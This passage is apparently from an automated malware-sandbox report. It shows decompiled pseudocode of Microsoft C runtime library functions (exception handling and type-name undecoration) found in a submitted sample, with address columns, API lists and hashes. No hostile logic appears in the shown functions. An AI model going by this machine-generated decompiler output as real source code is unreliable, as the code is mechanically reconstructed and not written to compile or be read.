								_v24 =  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c));
								 *((intOrPtr*)(E0095C670(_t266,  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c)), _t352, _t353) + 0x1c)) = 0;
								_t254 = L0095DF20(_t266, _t352, _t353, _a4, _v24);
								_t355 = _t355 + 8;
								_t309 = _t254 & 0x000000ff;
								if((_t254 & 0x000000ff) == 0) {
									_t255 = E0095DFD0(_v24);
									_t355 = _t355 + 4;
									if((_t255 & 0x000000ff) == 0) {
										E00999BF0(_t309);
									} else {
										_push(1);
										E0095B0E0(_a4);
										_t355 = _t355 + 8;
										E0095D750( &_v136);
										E0095BE10( &_v136, 0xa03bbc);
									}
								}
							}
							goto L27;
						}
						_t307 = _a4;
						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3) {
							L19:
							goto L21;
						} else {
							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930520) {
								L18:
								if( *((intOrPtr*)(_a4 + 0x1c)) == 0) {
									goto L20;
								}
								goto L19;
							}
							_t307 = _a4;
							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_a4 + 0x14)) == 0x19930522) {
								goto L18;
							} else {
								goto L19;
							}
						}
					}
				}
				_t267 = _a16;
				_t265 = L0095DF10(_a16, _a20);
				_t355 = _t355 + 8;
				if(_v12 >= _t265) {
					goto L3;
				} else {
					goto L4;
				}
			}













































                      0x0095cd60
                      0x0095cd60
                      0x0095cd60
                      0x0095cd69
                      0x0095cd6d
                      0x0095cd78
                      0x0095cd80
                      0x0095cd85
                      0x0095cd88
                      0x0095cd8f
                      0x0095cda8
                      0x0095cda8
                      0x0095cdad
                      0x0095cdb6
                      0x0095cef5
                      0x0095cefe
                      0x0095cf0c
                      0x0095d225
                      0x0095d22f
                      0x0095d237
                      0x0095d239
                      0x0095d239
                      0x0095d25a
                      0x0095d25e
                      0x0095d263
                      0x00000000
                      0x0095cf47
                      0x0095cf47
                      0x0095cf51
                      0x0095d0c9
                      0x0095d0ce
                      0x0095d0d6
                      0x0095d0fd
                      0x0095d0fd
                      0x0095d102
                      0x0095d108
                      0x0095d10a
                      0x0095d10c
                      0x0095d110
                      0x0095d115
                      0x0095d115
                      0x0095d127
                      0x0095d223
                      0x0095d266
                      0x0095d266
                      0x0095d26f
                      0x00000000
                      0x0095d273
                      0x00000000
                      0x0095d12d
                      0x0095d12d
                      0x0095d131
                      0x0095d136
                      0x0095d13b
                      0x0095d15e
                      0x0095d15e
                      0x0095d16f
                      0x0095d179
                      0x0095d184
                      0x0095d187
                      0x0095d187
                      0x0095d190
                      0x0095d199
                      0x0095d1aa
                      0x0095d1b4
                      0x0095d1bf
                      0x0095d1c6
                      0x0095d1df
                      0x0095d1c8
                      0x0095d1d0
                      0x0095d1d0
                      0x0095d1f0
                      0x0095d205
                      0x0095d215
                      0x0095d218
                      0x0095d21d
                      0x0095d220
                      0x0095d220
                      0x00000000
                      0x0095d1aa
                      0x0095d141
                      0x0095d146
                      0x0095d14e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d14e
                      0x0095d127
                      0x0095d0dc
                      0x0095d0e1
                      0x0095d0e4
                      0x0095d0e9
                      0x0095d0fb
                      0x00000000
                      0x0095d0fb
                      0x0095d0ef
                      0x0095d0f4
                      0x0095d0f9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d0f9
                      0x0095cf6f
                      0x0095cf74
                      0x0095cf7d
                      0x0095cf80
                      0x0095cf8d
                      0x0095cf91
                      0x0095cf9e
                      0x00000000
                      0x00000000
                      0x0095cfab
                      0x0095cfb6
                      0x00000000
                      0x0095cfc2
                      0x0095cfc2
                      0x0095cfc4
                      0x0095cfcd
                      0x0095cfd5
                      0x0095cfdf
                      0x0095cfeb
                      0x0095cffa
                      0x0095d018
                      0x0095d029
                      0x0095d037
                      0x0095d04e
                      0x0095d059
                      0x0095d06b
                      0x0095d070
                      0x0095d075
                      0x0095d07d
                      0x0095d082
                      0x0095d0ab
                      0x0095d0b0
                      0x00000000
                      0x0095d0b0
                      0x0095d042
                      0x0095d04b
                      0x0095d04b
                      0x0095cff5
                      0x0095cff5
                      0x0095d0be
                      0x0095cf85
                      0x0095cf88
                      0x00000000
                      0x0095cf88
                      0x0095cfb6
                      0x00000000
                      0x0095d0c3
                      0x0095cdf1
                      0x0095cdf1
                      0x0095cdf8
                      0x00000000
                      0x00000000
                      0x0095cdfe
                      0x0095ce07
                      0x00000000
                      0x00000000
                      0x0095ce16
                      0x0095ce21
                      0x0095ce24
                      0x0095ce2c
                      0x0095ce71
                      0x0095ce71
                      0x0095ce76
                      0x0095ce7f
                      0x0095ce89
                      0x0095ce91
                      0x0095cea0
                      0x0095cea5
                      0x0095cea8
                      0x0095cead
                      0x0095ceb5
                      0x0095ceba
                      0x0095cec2
                      0x0095cef0
                      0x0095cec4
                      0x0095cec4
                      0x0095ceca
                      0x0095cecf
                      0x0095ced8
                      0x0095cee9
                      0x0095cee9
                      0x0095cec2
                      0x0095cead
                      0x00000000
                      0x0095ce7f
                      0x0095ce2e
                      0x0095ce37
                      0x0095ce6f
                      0x00000000
                      0x0095ce42
                      0x0095ce4c
                      0x0095ce66
                      0x0095ce6d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095ce6d
                      0x0095ce4e
                      0x0095ce58
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095ce58
                      0x0095ce37
                      0x0095cdb6
                      0x0095cd95
                      0x0095cd99
                      0x0095cd9e
                      0x0095cda4
                      0x00000000
                      0x0095cda6
                      0x00000000
                      0x0095cda6

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CDFE
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE0E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE19
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE76
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE81
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE8C
                      • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 0095CEB5
                        • Part of subcall function 0095DFD0: type_info::operator==.LIBVCRUNTIMED ref: 0095E00D
                      • ___DestructExceptionObject.LIBCMTD ref: 0095CECA
                      • std::bad_alloc::bad_alloc.LIBCMTD ref: 0095CED8
                        • Part of subcall function 0095D750: std::exception::exception.LIBCMTD ref: 0095D761
                        • Part of subcall function 0095BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 0095BEAA
                      • _Smanip.LIBCPMTD ref: 0095CEFE
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0095CF88
                      • weak_ptr.LIBCPMTD ref: 0095CFDF
                      • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 0095CFEB
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0095CFF5
                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0095D001
                      • CatchIt.LIBCMTD ref: 0095D0AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                      • String ID: csm$csm$csm
                      • API String ID: 2995349249-393685449
                      • Opcode ID: 866dd8ae060feb842cd8e002a8f16b0539daf1b6d69e9a97806facd2ca3e3e91
                      • Instruction ID: a8a1f253278af43e899c2275bf87b7bec8fa5a819e9f8c6d48ca27577fe20a8e
                      • Opcode Fuzzy Hash: 866dd8ae060feb842cd8e002a8f16b0539daf1b6d69e9a97806facd2ca3e3e91
                      • Instruction Fuzzy Hash: E3F194B5901209DFCB18DFA6D881AEE7779BF94302F108518FC159B241DB35EE89CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00962CD0 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 326COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00962CD0(signed int _a4, signed int _a8) {
				char _v12;
				signed int _v13;
				signed int _v14;
				void* _v15;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				char _v100;
				signed int _v104;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				char _v132;
				signed int _v136;
				char _v140;
				signed int _v144;
				char _v148;
				signed int _v152;
				char _v156;
				signed int _v160;
				char _v164;
				signed int _v168;
				char _v172;
				signed int _v176;
				char _v180;
				signed int _v184;
				char _v188;
				signed int _v192;
				char _v196;
				signed int _v200;
				char _v204;
				signed int _v208;
				char _v212;
				signed int _v216;
				char _v220;
				signed int _v224;
				char _v228;
				signed int _v232;
				char _v236;
				signed int _v240;
				char _v244;
				signed int _v248;
				char _v252;
				signed int _v256;
				char _v260;
				void* _v264;
				void* _v268;
				intOrPtr _v272;
				char _v276;
				signed int _v280;
				char _v284;
				intOrPtr _v288;
				char _v292;
				signed int _v296;
				char _v300;
				char _v308;
				char _v316;
				char _v324;
				char _v332;
				char _v340;
				void* _v348;
				char _v356;
				signed int _t219;
				signed int _t225;
				void* _t227;
				signed int _t229;
				signed int _t232;
				char _t236;
				char _t239;
				char _t243;
				signed int _t248;
				signed int _t273;
				signed int _t309;
				signed int _t310;
				signed int _t313;
				char* _t314;
				char* _t315;
				signed int _t318;
				void* _t321;
				void* _t323;

				_t219 =  *0xb30640; // 0x0
				if( *_t219 == 0) {
					E0095FB00(__eflags, _a4, 1, _a8);
					return _a4;
				}
				_t309 =  *0xb30640; // 0x0
				_v15 =  *_t309;
				_t273 =  *0xb30640; // 0x0
				 *0xb30640 = _t273 + 1;
				_t310 = _v15;
				_v13 = _t310;
				_v14 = 0;
				_v20 = 0xffffffff;
				E0095F3F0( &_v12);
				_v24 = _v13 & 0x000000ff;
				_v24 = _v24 - 0x43;
				if(_v24 > 0x1c) {
					L35:
					_t225 =  *0xb30640; // 0x0
					 *0xb30640 = _t225 - 1;
					_t227 = E00964C20(_t310,  &_v324);
					_t323 = _t321 + 4;
					E0095F820( &_v12, _t227);
					_t229 = E0096A560( &_v12);
					__eflags = _t229;
					if(_t229 == 0) {
						L37:
						if(_v20 != 0xffffffff) {
							E0095F3F0( &_v44);
							E0095F240( &_v60, _a8);
							__eflags = _v20 - 0xfffffffe;
							if(_v20 != 0xfffffffe) {
								_t232 = E0096A560(_a8);
								__eflags = _t232;
								if(_t232 != 0) {
									__eflags = _v20 & 0x00000001;
									if((_v20 & 0x00000001) == 0) {
										_t313 = _v20 & 0x00000002;
										__eflags = _t313;
										if(_t313 != 0) {
											_t236 = E00960060("volatile", 8);
											_t323 = _t323 + 8;
											_v300 = _t236;
											_v296 = _t313;
											E0095F7E0( &_v44,  &_v300);
										}
									} else {
										_t239 = E00960060("const", 5);
										_t323 = _t323 + 8;
										_v284 = _t239;
										_v280 = _t310;
										_t314 =  &_v284;
										E0095F7E0( &_v44, _t314);
										__eflags = _v20 & 0x00000002;
										if((_v20 & 0x00000002) != 0) {
											_t243 = E00960060(" volatile", 9);
											_t323 = _t323 + 8;
											_v292 = _t243;
											_v288 = _t314;
											E0095FCA0( &_v44,  &_v292);
										}
									}
								}
								E00966A70(_a4,  &_v44,  &_v60);
								return _a4;
							}
							E0096AA80( &_v60);
							_t315 =  &_v60;
							E00966A90( &_v52,  &_v44, _t315);
							_t248 = E0096A520( &_v52);
							__eflags = _t248;
							if(_t248 == 0) {
								_v276 = E00960060(0x9d8da8, 2);
								_v272 = _t315;
								E0095FCA0( &_v52,  &_v276);
							}
							E0095F240(_a4,  &_v52);
							return _a4;
						}
						_v28 = _v13 & 0x000000ff;
						_v28 = _v28 - 0x43;
						if(_v28 > 0x1c) {
							L45:
							if(E0096A560(_a8) == 0) {
								E0095FD40( &_v12, E0095FAD0( &_v356, 0x20, _a8));
							}
							E0095F240(_a4,  &_v12);
							return _a4;
						}
						_t318 = _v28;
						_t144 = _t318 + 0x9635fc; // 0x498d02
						switch( *((intOrPtr*)(( *_t144 & 0x000000ff) * 4 +  &M009635EC))) {
							case 0:
								_v260 = E00960060("signed ", 7);
								_v256 = __edx;
								__ecx =  &_v12;
								__edx =  &_v260;
								 &_v340 = E0095FAA0( &_v340,  &_v260,  &_v12);
								__ecx =  &_v12;
								__eax = E0095F820(__ecx, __eax);
								goto L45;
							case 1:
								_v252 = E00960060("unsigned ", 9);
								_v248 = _t318;
								_t264 = E0095FAA0( &_v332,  &_v252,  &_v12);
								_t323 = _t323 + 0x14;
								E0095F820( &_v12, _t264);
								goto L45;
							case 2:
								__ecx = _v14 & 0x000000ff;
								_v32 = __ecx;
								_v32 = _v32 - 0x45;
								_v32 = _v32 - 0x45;
								__eflags = _v32 - 8;
								if(_v32 > 8) {
									goto L45;
								}
								__eax = _v32;
								switch( *((intOrPtr*)(_v32 * 4 +  &M0096361C))) {
									case 0:
										goto L44;
									case 1:
										goto L45;
								}
							case 3:
								goto L45;
						}
					}
					E0095F240(_a4,  &_v12);
					return _a4;
				}
				_t310 = _v24;
				_t13 = _t310 + 0x963528; // 0x498d09
				switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M009634FC))) {
					case 0:
						_t269 = E00960060("char", 4);
						_t323 = _t321 + 8;
						_v68 = _t269;
						_v64 = _t310;
						E0095F7E0( &_v12,  &_v68);
						goto L37;
					case 1:
						_v76 = E00960060("short", 5);
						_v72 = __edx;
						__edx =  &_v76;
						__ecx =  &_v12;
						__eax = E0095F7E0(__ecx,  &_v76);
						goto L37;
					case 2:
						_v84 = E00960060("int", 3);
						_v80 = __edx;
						__eax =  &_v84;
						__ecx =  &_v12;
						__eax = E0095F7E0(__ecx,  &_v84);
						goto L37;
					case 3:
						_v92 = E00960060("long", 4);
						_v88 = __edx;
						__ecx =  &_v92;
						__ecx =  &_v12;
						__eax = E0095F7E0(__ecx,  &_v92);
						goto L37;
					case 4:
						_v100 = E00960060("float", 5);
						_v96 = __edx;
						__edx =  &_v100;
						__ecx =  &_v12;
						__eax = E0095F7E0(__ecx,  &_v100);
						goto L37;
					case 5:
						L9:
						_v116 = E00960060("double", 6);
						_v112 = __edx;
						__ecx =  &_v116;
						__ecx =  &_v12;
						__eax = E0095FCA0(__ecx,  &_v116);
						goto L37;
					case 6:
						_v108 = E00960060("long ", 5);
						_v104 = __edx;
						__eax =  &_v108;
						__ecx =  &_v12;
						__eax = E0095F7E0( &_v12,  &_v108);
						goto L9;
					case 7:
						_v13 & 0x000000ff = _v13 & 3;
						_v20 = _v13 & 3;
						goto L37;
					case 8:
						_v244 = E00960060("void", 4);
						_v240 = __edx;
						__edx =  &_v244;
						__ecx =  &_v12;
						__eax = E0095F7E0(__ecx,  &_v244);
						goto L37;
					case 9:
						__eax =  *0xb30640;
						_v16 =  *( *0xb30640);
						 *0xb30640 =  *0xb30640 + 1;
						 *0xb30640 =  *0xb30640 + 1;
						_v14 = _v16;
						__ecx = _v14 & 0x000000ff;
						_v36 = __ecx;
						__eflags = _v36 - 0x59;
						if(_v36 > 0x59) {
							L32:
							_v236 = E00960060("UNKNOWN", 7);
							_v232 = __edx;
							__ecx =  &_v236;
							__ecx =  &_v12;
							__eax = E0095F7E0(__ecx,  &_v236);
							L33:
							goto L37;
						}
						__edx = _v36;
						__eax =  *(_v36 + 0x963590) & 0x000000ff;
						switch( *((intOrPtr*)(( *(_v36 + 0x963590) & 0x000000ff) * 4 +  &M00963548))) {
							case 0:
								 *0xb30640 =  *0xb30640 - 1;
								 *0xb30640 =  *0xb30640 - 1;
								__ecx =  &_v12;
								__eax = E0095F920(__ecx, 1);
								goto L33;
							case 1:
								_v228 = E00960060("__w64 ", 6);
								_v224 = __edx;
								__edx = _a8;
								 &_v316 = E00962CD0( &_v316, _a8);
								__ecx =  &_v228;
								__edx = _a4;
								__eax = _a4;
								return _a4;
							case 2:
								_v132 = E00960060("__int8", 6);
								_v128 = __edx;
								__edx =  &_v132;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v132);
								goto L33;
							case 3:
								_v140 = E00960060("__int16", 7);
								_v136 = __edx;
								__eax =  &_v140;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v140);
								goto L33;
							case 4:
								_v148 = E00960060("__int32", 7);
								_v144 = __edx;
								__ecx =  &_v148;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v148);
								goto L33;
							case 5:
								_v156 = E00960060("__int64", 7);
								_v152 = __edx;
								__edx =  &_v156;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v156);
								goto L33;
							case 6:
								_v164 = E00960060("__int128", 8);
								_v160 = __edx;
								__eax =  &_v164;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v164);
								goto L33;
							case 7:
								_v124 = E00960060("bool", 4);
								_v120 = __edx;
								__ecx =  &_v124;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v124);
								goto L33;
							case 8:
								_v20 = 0xfffffffe;
								goto L33;
							case 9:
								_v212 = E00960060("auto", 4);
								_v208 = __edx;
								__eax =  &_v212;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v212);
								goto L33;
							case 0xa:
								_v180 = E00960060("char8_t", 7);
								_v176 = __edx;
								__edx =  &_v180;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v180);
								goto L33;
							case 0xb:
								_v172 = E00960060("<unknown>", 9);
								_v168 = __edx;
								__ecx =  &_v172;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v172);
								goto L33;
							case 0xc:
								_v188 = E00960060("char16_t", 8);
								_v184 = __edx;
								__eax =  &_v188;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v188);
								goto L33;
							case 0xd:
								_v220 = E00960060("decltype(auto)", 0xe);
								_v216 = __edx;
								__ecx =  &_v220;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v220);
								goto L33;
							case 0xe:
								_v196 = E00960060("char32_t", 8);
								_v192 = __edx;
								__ecx =  &_v196;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v196);
								goto L33;
							case 0xf:
								_v204 = E00960060("wchar_t", 7);
								_v200 = __edx;
								__edx =  &_v204;
								__ecx =  &_v12;
								__eax = E0095F7E0(__ecx,  &_v204);
								goto L33;
							case 0x10:
								__edx =  *0xb30640;
								__edx =  *0xb30640 - 1;
								 *0xb30640 = __edx;
								 &_v308 = E00964C20(__edx,  &_v308);
								__ecx =  &_v12;
								__eax = E0095F820( &_v12, __eax);
								__ecx =  &_v12;
								__eax = E0096A560(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									__ecx =  &_v12;
									__ecx = _a4;
									E0095F240(_a4,  &_v12) = _a4;
									return _a4;
								}
								goto L33;
							case 0x11:
								goto L32;
						}
					case 0xa:
						goto L35;
				}
			}





































































































                      0x00962cd9
                      0x00962ce3
                      0x009634eb
                      0x00000000
                      0x009634f3
                      0x00962ce9
                      0x00962cf1
                      0x00962cf4
                      0x00962cfd
                      0x00962d03
                      0x00962d06
                      0x00962d09
                      0x00962d0d
                      0x00962d17
                      0x00962d20
                      0x00962d29
                      0x00962d30
                      0x00963200
                      0x00963200
                      0x00963208
                      0x00963214
                      0x00963219
                      0x00963220
                      0x00963228
                      0x0096322d
                      0x0096322f
                      0x00963245
                      0x00963249
                      0x009633a1
                      0x009633ad
                      0x009633b2
                      0x009633b6
                      0x00963421
                      0x00963426
                      0x00963428
                      0x00963431
                      0x00963434
                      0x00963497
                      0x00963497
                      0x0096349a
                      0x009634a3
                      0x009634a8
                      0x009634ab
                      0x009634b1
                      0x009634c1
                      0x009634c1
                      0x00963436
                      0x0096343d
                      0x00963442
                      0x00963445
                      0x0096344b
                      0x00963451
                      0x0096345b
                      0x00963463
                      0x00963466
                      0x0096346f
                      0x00963474
                      0x00963477
                      0x0096347d
                      0x0096348d
                      0x0096348d
                      0x00963492
                      0x00963434
                      0x009634d2
                      0x00000000
                      0x009634da
                      0x009633bb
                      0x009633c0
                      0x009633cc
                      0x009633d7
                      0x009633dc
                      0x009633de
                      0x009633ef
                      0x009633f5
                      0x00963405
                      0x00963405
                      0x00963411
                      0x00000000
                      0x00963416
                      0x00963253
                      0x0096325c
                      0x00963263
                      0x0096335b
                      0x00963365
                      0x00963380
                      0x00963380
                      0x0096338c
                      0x00000000
                      0x00963391
                      0x00963269
                      0x0096326c
                      0x00963273
                      0x00000000
                      0x009632cc
                      0x009632d2
                      0x009632d8
                      0x009632dc
                      0x009632ea
                      0x009632f3
                      0x009632f6
                      0x00000000
                      0x00000000
                      0x00963289
                      0x0096328f
                      0x009632a7
                      0x009632ac
                      0x009632b3
                      0x00000000
                      0x00000000
                      0x009632fd
                      0x00963301
                      0x00963307
                      0x0096330a
                      0x0096330d
                      0x00963311
                      0x00000000
                      0x00000000
                      0x00963313
                      0x00963316
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00963273
                      0x00963238
                      0x00000000
                      0x0096323d
                      0x00962d36
                      0x00962d39
                      0x00962d40
                      0x00000000
                      0x00962d4e
                      0x00962d53
                      0x00962d56
                      0x00962d59
                      0x00962d63
                      0x00000000
                      0x00000000
                      0x00962d7c
                      0x00962d7f
                      0x00962d82
                      0x00962d86
                      0x00962d89
                      0x00000000
                      0x00000000
                      0x00962da2
                      0x00962da5
                      0x00962da8
                      0x00962dac
                      0x00962daf
                      0x00000000
                      0x00000000
                      0x00962dc8
                      0x00962dcb
                      0x00962dce
                      0x00962dd2
                      0x00962dd5
                      0x00000000
                      0x00000000
                      0x00962dee
                      0x00962df1
                      0x00962df4
                      0x00962df8
                      0x00962dfb
                      0x00000000
                      0x00000000
                      0x00962e26
                      0x00962e35
                      0x00962e38
                      0x00962e3b
                      0x00962e3f
                      0x00962e42
                      0x00000000
                      0x00000000
                      0x00962e14
                      0x00962e17
                      0x00962e1a
                      0x00962e1e
                      0x00962e21
                      0x00000000
                      0x00000000
                      0x00962e50
                      0x00962e53
                      0x00000000
                      0x00000000
                      0x009631e3
                      0x009631e9
                      0x009631ef
                      0x009631f6
                      0x009631f9
                      0x00000000
                      0x00000000
                      0x00962e5b
                      0x00962e62
                      0x00962e6b
                      0x00962e6e
                      0x00962e77
                      0x00962e7a
                      0x00962e7e
                      0x00962e81
                      0x00962e85
                      0x009631a8
                      0x009631b7
                      0x009631bd
                      0x009631c3
                      0x009631ca
                      0x009631cd
                      0x009631d2
                      0x00000000
                      0x009631d2
                      0x00962e8b
                      0x00962e8e
                      0x00962e95
                      0x00000000
                      0x00963194
                      0x00963197
                      0x0096319e
                      0x009631a1
                      0x00000000
                      0x00000000
                      0x00963154
                      0x0096315a
                      0x00963160
                      0x0096316b
                      0x00963174
                      0x0096317b
                      0x00963187
                      0x00000000
                      0x00000000
                      0x00962edd
                      0x00962ee0
                      0x00962ee3
                      0x00962ee7
                      0x00962eea
                      0x00000000
                      0x00000000
                      0x00962f03
                      0x00962f09
                      0x00962f0f
                      0x00962f16
                      0x00962f19
                      0x00000000
                      0x00000000
                      0x00962f32
                      0x00962f38
                      0x00962f3e
                      0x00962f45
                      0x00962f48
                      0x00000000
                      0x00000000
                      0x00962f61
                      0x00962f67
                      0x00962f6d
                      0x00962f74
                      0x00962f77
                      0x00000000
                      0x00000000
                      0x00962f90
                      0x00962f96
                      0x00962f9c
                      0x00962fa3
                      0x00962fa6
                      0x00000000
                      0x00000000
                      0x00962eb7
                      0x00962eba
                      0x00962ebd
                      0x00962ec1
                      0x00962ec4
                      0x00000000
                      0x00000000
                      0x00962e9c
                      0x00000000
                      0x00000000
                      0x009630aa
                      0x009630b0
                      0x009630b6
                      0x009630bd
                      0x009630c0
                      0x00000000
                      0x00000000
                      0x00962fee
                      0x00962ff4
                      0x00962ffa
                      0x00963001
                      0x00963004
                      0x00000000
                      0x00000000
                      0x00962fbf
                      0x00962fc5
                      0x00962fcb
                      0x00962fd2
                      0x00962fd5
                      0x00000000
                      0x00000000
                      0x0096301d
                      0x00963023
                      0x00963029
                      0x00963030
                      0x00963033
                      0x00000000
                      0x00000000
                      0x009630d9
                      0x009630df
                      0x009630e5
                      0x009630ec
                      0x009630ef
                      0x00000000
                      0x00000000
                      0x0096304c
                      0x00963052
                      0x00963058
                      0x0096305f
                      0x00963062
                      0x00000000
                      0x00000000
                      0x0096307b
                      0x00963081
                      0x00963087
                      0x0096308e
                      0x00963091
                      0x00000000
                      0x00000000
                      0x009630f9
                      0x009630ff
                      0x00963102
                      0x0096310f
                      0x00963118
                      0x0096311b
                      0x00963120
                      0x00963123
                      0x00963128
                      0x0096312a
                      0x0096312c
                      0x00963130
                      0x00963138
                      0x00000000
                      0x00963138
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
                      • String ID: volatile$char$const$double$float$int$long$long $short$signed $unsigned $volatile
                      • API String ID: 2623725463-1006727529
                      • Opcode ID: 2ac9fee540ff52833f9d17890e99ee12b926475ad5353a4b82855847a2ef3dba
                      • Instruction ID: 1be7e9f67a5acd57c83968944b0eeaf3acf83d4c91b3104dade9ce04ed908eea
                      • Opcode Fuzzy Hash: 2ac9fee540ff52833f9d17890e99ee12b926475ad5353a4b82855847a2ef3dba
                      • Instruction Fuzzy Hash: D9D171B5C44208ABCB15EFA4DC52BEEBB74AF94311F04816AE51A6B281EB705748CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00965E80 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 243COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 99%
                      			E00965E80(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				char _v12;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				char _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v136;
				char _v144;
				char _v152;
				signed int _v156;
				char _v160;
				char _v168;
				signed int _v172;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				char _v288;
				char _v296;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				signed int _t256;
				signed int _t271;

				E0095F3F0( &_v12);
				E0095F3F0( &_v36);
				_v60 = 0;
				_v20 = 0;
				_t256 =  *0xb30640; // 0x0
				_v80 =  *_t256;
				_t271 =  *0xb30640; // 0x0
				 *0xb30640 = _t271 + 1;
